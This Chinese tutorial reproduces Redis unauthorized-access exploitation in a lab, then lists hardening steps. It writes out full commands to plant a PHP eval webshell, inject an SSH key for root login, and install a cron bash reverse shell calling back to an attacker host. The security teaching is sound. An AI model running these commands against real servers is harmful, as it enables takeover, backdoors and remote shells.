Redis未授权访问漏洞实战复现：在虚拟机环境中深度剖析安全风险与防御策略

随着企业对高性能缓存数据库的依赖日益加深，Redis 作为最受欢迎的内存数据存储系统之一，已成为现代应用架构的核心组件。然而，一个配置不当即可引发严重后果——Redis未授权访问漏洞正成为黑客入侵服务器的主要突破口。

本文将带你从零开始，在虚拟机环境中完整复现 Redis 未授权访问漏洞的攻击流程，并深入解析其原理、危害及最有效的防护方案，帮助开发者和运维人员筑牢安全防线。

🔍 什么是 Redis 未授权访问漏洞？

Redis 默认监听 TCP 端口 6379，且在默认安装下不启用密码认证机制（requirepass 为空），同时绑定到 0.0.0.0，允许任意 IP 访问。如果未通过防火墙或网络策略限制访问来源，就会导致 Redis 服务暴露在公网或内网中，被任意用户直接连接并执行高危操作。

⚠️ 核心风险点：攻击者无需身份验证即可完全控制 Redis 实例，进而利用其持久化机制写入恶意文件，最终实现 GetShell、SSH 免密登录、反弹 Shell 等远程命令执行行为。

该漏洞影响广泛，涵盖 Redis 2.x 至 5.x 多个版本，尤其在自托管部署场景中极为常见。

🧪 实验环境搭建（基于虚拟机）

为安全起见，所有操作均在隔离的虚拟机环境中进行，推荐使用以下配置：

✅ 步骤 1：靶机安装 Redis

1# 下载 Redis 源码包
2wget http://download.redis.io/releases/redis-5.0.5.tar.gz
3
4# 解压并编译
5tar -zxvf redis-5.0.5.tar.gz
6cd redis-5.0.5
7make
8
9# 安装客户端和服务端工具
10sudo cp src/redis-server /usr/local/bin/
11sudo cp src/redis-cli /usr/local/bin/
12
13# 启动 Redis（默认无密码）
14redis-server --bind 0.0.0.0 --protected-mode no &

💡 注意：--protected-mode no 表示关闭保护模式，模拟存在漏洞的配置。

🛸 漏洞检测与利用方式详解

方法一：远程连接验证是否存在漏洞

在 Kali 攻击机上使用 redis-cli 连接目标：

1redis-cli -h 192.168.10.20

若能成功进入 Redis 命令行界面而无需输入密码，则说明存在未授权访问漏洞。

执行 info 命令查看返回信息，确认可读取敏感配置。

方法二：写入 WebShell 获取网站控制权

假设目标服务器运行着 Web 服务，且根目录位于 /var/www/html。

1# 设置持久化路径为 Web 目录
2config set dir /var/www/html
3
4# 设置 RDB 文件名为 shell.php
5config set dbfilename webshell.php
6
7# 写入一句话木马
8set payload "<?php @eval($_POST['cmd']);?>"
9
10# 保存到磁盘
11save

此时访问 http://192.168.10.20/webshell.php，可用蚁剑、冰蝎等工具连接，获得 WebShell 权限。

⚠️ 提示：为避免 Redis 自动添加的元数据干扰 PHP 解析，建议前后加入换行符：

1set payload "\n\n<?php @eval(\$_POST['cmd']);?>\n\n"

方法三：SSH 公钥免密登录（获取 root 权限）

此方法适用于 Redis 以 root 用户启动的情况。

1. 在 Kali 上生成 SSH 密钥对

1ssh-keygen -t rsa -C "attack@kali"

2. 将公钥内容写入 Redis 缓冲区

1(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/pub.key
2cat /tmp/pub.key | redis-cli -h 192.168.10.20 -x set crack

3. 将 Redis 数据库导出路径设为 .ssh/authorized_keys

1redis-cli -h 192.168.10.20
2
3config set dir /root/.ssh
4config set dbfilename authorized_keys
5save

4. 使用私钥登录靶机

1ssh -i ~/.ssh/id_rsa root@192.168.10.20

✅ 成功登录即表示已完全掌控服务器！

方法四：通过计划任务反弹 Shell

利用 Linux 的 crontab 定时任务机制触发反向 shell。

1# 设置 Redis 输出目录为 cron 目录
2config set dir /var/spool/cron/root
3
4# 创建包含反弹命令的键值
5set revshell "\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.10.10/4444 0>&1\n\n"
6
7# 更改文件名为 root（对应 root 用户的任务）
8config set dbfilename root
9
10# 保存
11save

在 Kali 上监听端口：

1nc -lvp 4444

等待一分钟，即可收到目标机器的 Shell 回连。

🛡️ 修复方案与最佳实践

面对如此严重的安全威胁，必须立即采取措施加固 Redis 服务。

✅ 推荐修复措施：

1. 设置强密码认证 修改 redis.conf 配置文件：

   1requirepass YourStrongPasswordHere!

   并重启服务生效。

2. 限制绑定 IP 和端口

   1bind 127.0.0.1    # 仅本地访问
   2# 或指定可信内网IP
   3bind 192.168.10.20

3. 启用防火墙规则

   1# 仅允许特定IP访问6379端口
   2iptables -A INPUT -p tcp --dport 6379 -s 192.168.10.0/24 -j ACCEPT
   3iptables -A INPUT -p tcp --dport 6379 -j DROP

4. 禁用高危命令（可选） 在 redis.conf 中重命名或屏蔽危险命令：

   1rename-command FLUSHALL ""
   2rename-command CONFIG ""
   3rename-command EVAL ""

5. 以非 root 用户运行 Redis 创建专用账户运行服务，降低权限提升风险。

6. 升级至最新稳定版 根据 Redis 官方公告，及时更新以防范已知漏洞。例如，近期披露的 CVE-2025-49844（潜伏13年的RCE漏洞）已影响多个旧版本。

📢 延伸思考：云时代下的 Redis 安全

根据 Wiz 研究团队披露的数据，全球仍有超过 33 万个 Redis 实例暴露在互联网上，其中约 6 万个未配置任何认证机制。这不仅是个技术问题，更是企业安全管理意识的体现。

“鉴于 Redis 被用于约 75% 的云环境，潜在影响范围极广。”
—— Benny Isaacs, Wiz Research

即使是使用 Redis Cloud 等托管服务，也应定期审计访问策略、开启日志监控、配置 VPC 私有网络访问，杜绝“裸奔”式部署。